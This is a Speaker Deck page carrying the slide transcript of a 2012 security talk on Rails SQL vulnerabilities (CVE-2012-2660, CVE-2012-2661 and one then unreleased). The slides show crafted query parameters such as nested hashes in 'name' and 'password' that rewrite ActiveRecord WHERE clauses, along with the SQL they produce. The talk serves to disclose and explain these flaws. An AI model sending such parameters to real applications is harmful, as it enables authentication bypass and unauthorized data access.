Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
68
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
140
The Evolution of Rails Security
presidentbeef
1
810
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
140
Practical Static Analysis for Continuous Application Security
presidentbeef
0
200
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
440
Continuous Security with Practical Static Analysis
presidentbeef
1
310
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
240
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
230
Other Decks in Programming
See All in Programming
대규모 트래픽을 처리하는 프론트 개발자의 전략
maryang
0
120
React は次の10年を生き残れるか:3つのトレンドから考える
oukayuka
41
16k
AIのメモリー
watany
13
1.4k
プロダクトという一杯を作る - プロダクトチームが味の責任を持つまでの煮込み奮闘記
hiliteeternal
0
450
JetBrainsのAI機能の紹介 #jjug
yusuke
0
200
What's new in Adaptive Android development
fornewid
0
140
kiroでゲームを作ってみた
iriikeita
0
150
抽象化という思考のツール - 理解と活用 - / Abstraction-as-a-Tool-for-Thinking
shin1x1
1
950
AHC051解法紹介
eijirou
0
380
ライブ配信サービスの インフラのジレンマ -マルチクラウドに至ったワケ-
mirrativ
1
130
なぜ今、Terraformの本を書いたのか? - 著者陣に聞く!『Terraformではじめる実践IaC』登壇資料
fufuhu
4
560
一人でAIプロダクトを作るための工夫 〜技術選定・開発プロセス編〜 / I want AI to work harder
rkaga
10
2.3k
Featured
See All Featured
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
110
19k
Making the Leap to Tech Lead
cromwellryan
134
9.5k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
49
3k
Scaling GitHub
holman
461
140k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
131
19k
Rebuilding a faster, lazier Slack
samanthasiow
83
9.1k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
33
2.4k
4 Signs Your Business is Dying
shpigford
184
22k
A designer walks into a library…
pauljervisheath
207
24k
A Tale of Four Properties
chriscoyier
160
23k
The Pragmatic Product Professional
lauravandoore
36
6.8k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
44
2.4k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1